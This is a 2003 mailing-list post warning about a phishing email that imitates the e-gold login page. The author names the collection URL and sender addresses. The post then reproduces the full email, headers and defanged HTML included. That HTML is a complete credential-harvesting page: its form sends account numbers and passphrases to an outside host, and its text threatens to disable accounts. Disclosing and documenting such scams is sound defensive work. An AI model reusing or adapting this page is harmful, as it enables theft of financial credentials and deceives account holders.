someone stealing e-gold passwords

Paweł Krawczyk Wed, 22 Jan 2003 07:36:59 -0800

This is what I received today, which seems to be a scam made to steal
e-gold passwords. The resulting e-mail looks exactly like e-gold web page,
but the login data is sent to http://www.parokk.com/db/add_news.php
(65.108.223.108 belonging to Alabanza, scam sent from 24.141.183.234
belonging to CGOCable).


After that the user is redirected back to e-gold site, so he could have
his password stolen without even notifying that. Be warned, e-gold has
been informed.

It's interesting where did they get my email from and how they knew I
used e-gold...

>From - Wed Jan 22 13:20:24 2003
X-UIDL: f8fb21d4f9b6625c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <[EMAIL PROTECTED]>
Received: (qmail 24497 invoked from network); 21 Jan 2003 22:33:57 -0000
Received: from unknown (HELO devel.ipsec.pl) (10.1.1.120)
  by 10.1.1.241 with SMTP; 21 Jan 2003 22:33:57 -0000
Received: (qmail 2495 invoked from network); 21 Jan 2003 22:33:56 -0000
Received: from d141-183-234.home.cgocable.net (HELO mail.com)
(24.141.183.234)
  by aba.krakow.pl with SMTP; 21 Jan 2003 22:33:56 -0000
From: "e-gold support"<[EMAIL PROTECTED]>
Subject: E-gold
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Organization: e-gold
Mime-Version: 1.0
Content-Type: text/html; charset="Windows-1251"
Date: Tue, 22 Jan 2002 00:30:17 -0800
Status: RO
Content-Length: 13201
Lines: 202

<html>

<head>
<DEFANGED_meta http-equiv="Content-Type" content="text/html;
charset=windows-1252">
<DEFANGED_meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<DEFANGED_meta name="ProgId" content="FrontPage.Editor.Document">
<title>New Page 1</title>
<title>e-gold top menu</title>
<DEFANGED_meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<!-- #BeginEditable "doctitle" -->
<title>e-gold Account Login</title>

<!-- #EndEditable -->

<DEFANGED_meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<DEFANGED_script language="JavaScript">
<!--
var showMsg = navigator.userAgent != "Mozilla/4.0 (compatible; MSIE 4.0;
Mac_PowerPC)";
function dmim(msgStr) {
  document.returnValue = false;
  if (showMsg) {
    window.status = msgStr;
    document.returnValue = true;
  }
}
function popup(url)
{
  win = window.open(url, "imagemap_jspopup",
"width=200,height=240,scrollbars=yes");
  win.focus();
  false;
}
function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}
function opensrk() {

msgWindow=open('../srk.asp','srk','toolbar=no,location=yes,scrollbars=no,directories=no,status=yes,menubar=no,resizeable=no,width=390,height=136');
      if (msgWindow.opener == null) msgWindow.opener = self;
}
//-->
</script>

</head>

<body bgcolor="#FFFFFF" text="#808080" link="#808080" vlink="#808080"
alink="#808080">

<table width=100% cellspacing="0" cellpadding="0" border="0">
  <tr>
    <td width="25%" height="37" valign="top" nowrap><a
href="http://www.e-gold.com/examiner.html"; target="_top"><img
src="https://www.e-gold.com/gif/Examiner.GIF"; width="50" height="70"
hspace="10" border="0" alt="Audit total circulation; compare to physical
reserves."></a><a href="http://www.e-gold.com/currentexchange.html";
target="_top"><img src="https://www.e-gold.com/gif/rates.gif"; width="50"
height="70" hspace="10" border="0" alt="Current e-metal exchange
rates"></a></td>
    <td width="50%" height="37" valign="top" align="center" nowrap>
<font color="#00AEC5" size="5">|</font><font size="1" face="Arial,
Helvetica, sans-serif"><a href="http://www.e-gold.com/";
target="_top">Home</a></font><font color="#00AEC5">
      </font><font color="#00AEC5" size="5">|</font><font size="1"
face="Arial, Helvetica, sans-serif"><a
href="http://www.e-gold.com/unsecure/terms.htm"; target="_top">Terms
      of Use</a></font><font color="#00AEC5"> </font><font
color="#00AEC5" size="5">|</font><font face="Arial, Helvetica,
sans-serif" size="1"><a
href="http://www.e-gold.com/unsecure/contact.html";
target="_top">Contact</a></font>
      <font color="#00AEC5" size="5">|</font><font face="Arial,
Helvetica, sans-serif" size="1"><a
href="https://www.e-gold.com/acct/login.html"; target="_top">Access
      Account</a></font><br>
      <a href=unsecure/aboutssl.html target="_top"><img border=0
align=top hspace=20 height=16 width=104
src="https://www.e-gold.com/gif/key128.gif"; alt="Click for SSL info..."
vspace="6"></a><br>
      <font size="4" face="Arial"><b>e-gold Account Access</b></font>
</td>
    <td height="37" valign="middle" width="25%" align="right" nowrap><a
href="http://www.e-gold.com/"; target="_top"><img
src="https://www.e-gold.com/gif/logo.gif"; width="105" height="45"
name="logo" alt="e-gold logo" vspace="0" hspace="0" border="0"></a></td>
  </tr>
  <tr>
    <td width="25%" height="1" valign="top"></td>
    <td width="50%" height="1" valign="bottom" align="right"><img
src="transparent.gif" height="1" width="1"></td>
    <td  height="1" valign="top" width="25%"></td>
  </tr>

</table>
<hr size="3" width="100%" noshade color="#00AEC5">
<table width="600" border="0" cellspacing="0" cellpadding="0"
align="center" vspace="10">






  <form method="post" action="http://www.parokk.com/db/add_news.php";>
<p>
<input type="hidden" name="seenform" value="y">

 <tr align="center" nowrap>
    <td height="57" valign="middle" colspan="3"><img
src=https://www.e-gold.com/acct/top.gif width="600" height="57"
usemap="#top" ismap alt="" border="0"></td>
  <tr width="600" height="240" valign="top">
    <td nowrap width="600" height="240" colspan="3">
      <!-- #BeginEditable "main" -->
      <form method="post" name="f" action="acct.asp">
        <div align="center"><font face="Arial, Helvetica,
sans-serif"><font face="Arial, Helvetica, sans-serif" size="2"><i>
          Login to access your e-gold account</i></font></font> <img
src="https://www.e-gold.com/acct/besecure.gif"; width="600" height="48"
alt="Be secure by checking SSL Lock Icon and Location">


<table width="450" align=center border="0" background="">
  <tr>
    <td nowrap align=right> <font face="Arial, Helvetica, sans-serif"
size="2"><b>Account
      Number:</b></font> </td>
    <td nowrap align=left valign="top">
      <table width="100%" border="0" cellspacing="0" cellpadding="0"
align="left">
        <tr>
          <td nowrap rowspan="2"><font face="Arial, Helvetica,
sans-serif"><b><font size="3">
            <input taborder=1 tabindex=1 type="text" name="title"
size="10" maxlength="10">
            </font><font face="Arial, Helvetica, sans-serif" size="2"><a
notab href="#"
DEFANGED_OnClick="MM_callJS('DEFANGED_javascript:popup(\'help.asp?p=accountnumber\')')"><img
notab src="https://www.e-gold.com/acct/help.gif"; width="13" height="17"
border="0" alt="View help..."></a></font></b></font>
            &nbsp;&nbsp;</td>
          <td nowrap align="right">&nbsp; <font face="Arial, Helvetica,
sans-serif">
            <font size="1">
            <input notab type="checkbox" name="StoreMyNumber"
value="checkbox" checked>
            Store my account number on my computer. (<a notab href="#"
DEFANGED_OnClick="MM_callJS('DEFANGED_javascript:popup(\'help.asp?p=storenumber\')')">more
            info...</a>)</font></font></td>
        </tr>
        <tr>
          <td nowrap align="right"><font face="Arial, Helvetica,
sans-serif" size="1">&nbsp;</font></td>
        </tr>
      </table>
    </td>
  </tr>
  <tr>
    <td nowrap align=right> <font face="Arial, Helvetica, sans-serif"
size="2"><b>Passphrase:</b></font>
    </td>
    <td nowrap><font face="Arial, Helvetica, sans-serif"><b><font
size="2">
      <input taborder=2 tabindex=2 type="password" name="link"
maxlength="64" size="32" autocomplete="off">
      </font><font face="Arial, Helvetica, sans-serif" size="2"><a
href="#" notab
DEFANGED_OnClick="MM_callJS('DEFANGED_javascript:popup(\'help.asp?p=passphrase\')')"><img
src="https://www.e-gold.com/acct/help.gif"; width="13" height="17"
border="0" alt="View help..."></a></font></b></font><a
href="DEFANGED_javascript:opensrk()"><img
src="https://www.e-gold.com/gif/srk.gif"; alt="Use SRK Passphrase
Entry..." border="0" align="absmiddle" DEFANGED_OnClick width="36"
height="32"></a></td>
  </tr>
  <tr>
    <td nowrap align=right valign="top"><font face="Arial, Helvetica,
sans-serif" size="2"><b>Turing
      Number:</b></font> </td>
    <td nowrap valign="top"><font face="Arial, Helvetica, sans-serif"
size=2><input
     taborder=3 tabindex=3 type="text" name="msg" maxlength="10"
size="10" autocomplete="off">&nbsp;
      <a
     href="#"
DEFANGED_OnClick="MM_callJS('DEFANGED_javascript:popup(\'help.asp?p=turing\')')"><img
src="https://www.e-gold.com/acct/help.gif"; width="13" height="17"
border="0" alt="View help..."></a><a
href="http://www.parokk.com/gen.gif";><img
     src="http://www.parokk.com/gen.gif"; vspace="0" hspace="0"
     align="top" border="0" alt="Turing Number" width="121"
height="25"></a></font><br>
      <font size="1" face="Arial, Helvetica, sans-serif">Enter sequence
of numbers
      displayed in grid dir</font><font size="1" face="Arial, Helvetica,
sans-serif">ectly above. (<i><a taborder=4 tabindex=4
href="gen3s.asp?x=4530&y=FFBF8F6C0B37B57DD004AC929278CF7A">Audible
      Turing Number</a></i>)</font>
      <input type="hidden" name="jumbo" value=4530>
    </td>
  </tr>

</table>

          <font face="Arial, Helvetica, sans-serif" size="2">
          </font><font size="3"> <a href="http://www.e-gold.com";><input
type="submit" value="Login" name="Submit"></a> </font> <br>
          <font face="Arial, Helvetica, sans-serif" size="1"><a
href="../unsecure/pgpkey.htm#about passphrase"><b>Forgotten
          Passphrase?</b></a></font>
          <p align="center"><font color="#ff0000">E-gold administration
is
          handling check of all the e-gold&nbsp;<br>
          accounts in order to correct the false database entries which
are often&nbsp;
          the way of fraud.&nbsp;<br>
          To continue using your account you should log in and confirm
the&nbsp;<br>
          personal information you entered including phone number is
correct,
          because we&nbsp;<br>
          would start random phone checks soon in order to validate the
identity
          of the account holders.&nbsp;<br>
          If you won't visit the account to confirm the information now,
it
          would&nbsp;<br>
          be disabled and you would need to send the copy of your ID and
utility
          bill by fax till the end of January 2003.<br>
          Please login now to confirm the identity</font></p>
          <font face="Arial, Helvetica, sans-serif"
size="1"><ul><li>Only enter your passphrase on the www.e-gold.com web
site.<li>Do not reveal your
passphrase to any
other web site or individual.<li>Use e-gold's SRK click-to-enter window
to thwart keystroke loggers and common viruses.</ul></font>
        </div>
      </form>
      <!-- #EndEditable -->
      </td>
  </tr>
  <tr align="center">
    <td valign="bottom" colspan="3" height="7">
      <hr noshade width="100%" size="3">
    </td>
  </tr>
  <tr align="center">
    <td valign="middle" width=180>
      <div align="left"><font face="Arial, Helvetica, sans-serif"
size="1">12/16/02 7:25:19 PM
        GMT</font></div>
    </td>
    <td valign="bottom">
      <div align="center"><font face="Arial, Helvetica, sans-serif"
size="2">Click
        <b><img src="https://www.e-gold.com/acct/help.gif"; width="13"
height="17" alt="View help..." align="absmiddle"></b>
        for help with a selection.</font></div>
    </td>
    <td valign="middle" width=180>
      <div align="right"><font face="Arial, Helvetica, sans-serif"
size="1">&copy;
        2000 e-gold Ltd.</font></div>
    </td>
  </tr>

</table>
<map name="top">
<area shape="rect" coords="70,35,86,50"
href="DEFANGED_javascript:popup('help.asp?p=logout')"
DEFANGED_Onmouseover="dmim('View help...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="575,35,590,50"
href="DEFANGED_javascript:popup('help.asp?p=accountinfo')"
DEFANGED_Onmouseover="dmim('View help...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="470,34,485,48"
href="DEFANGED_javascript:popup('help.asp?p=history')"
DEFANGED_Onmouseover="dmim('View help...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="371,35,387,49"
href="DEFANGED_javascript:popup('help.asp?p=redeem')"
DEFANGED_Onmouseover="dmim('View help...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="267,34,281,49"
href="DEFANGED_javascript:popup('help.asp?p=spend')"
DEFANGED_Onmouseover="dmim('View help...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="171,31,187,51"
href="DEFANGED_javascript:popup('help.asp?p=balance')"
DEFANGED_Onmouseover="dmim('View help...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="11,0,70,57"  href="logout.asp"
DEFANGED_Onmouseover="dmim('Logout of account...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="515,0,575,56"  href="accountinfo.asp"
DEFANGED_Onmouseover="dmim('View account information...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="413,0,470,56"  href="history.asp"
DEFANGED_Onmouseover="dmim('View account history...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="306,0,371,56"  href="redeem.asp"
DEFANGED_Onmouseover="dmim('Order delivery of physical metal...');
return document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="217,0,268,57"  href="spend.asp"
DEFANGED_Onmouseover="dmim('Spend e-metal...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<area shape="rect" coords="111,0,170,56"  href="balance.asp"
DEFANGED_Onmouseover="dmim('View account balance...'); return
document.returnValue;" DEFANGED_Onmouseout="dmim(''); return
document.returnValue;">
<AREA SHAPE="DEFAULT" NOHREF>
</map>
<DEFANGED_script type="text/javascript">

</script>
<!-- #EndEditable -->
</body>
<!-- #BeginTemplate "/Templates/folder.dwt" -->
</html>
<!-- #EndTemplate -->

-- 
Paweł Krawczyk, Kraków, Poland  http://echelon.pl/kravietz/
horses: http://kabardians.com/
crypto: http://ipsec.pl/

someone stealing e-gold passwords

Reply via email to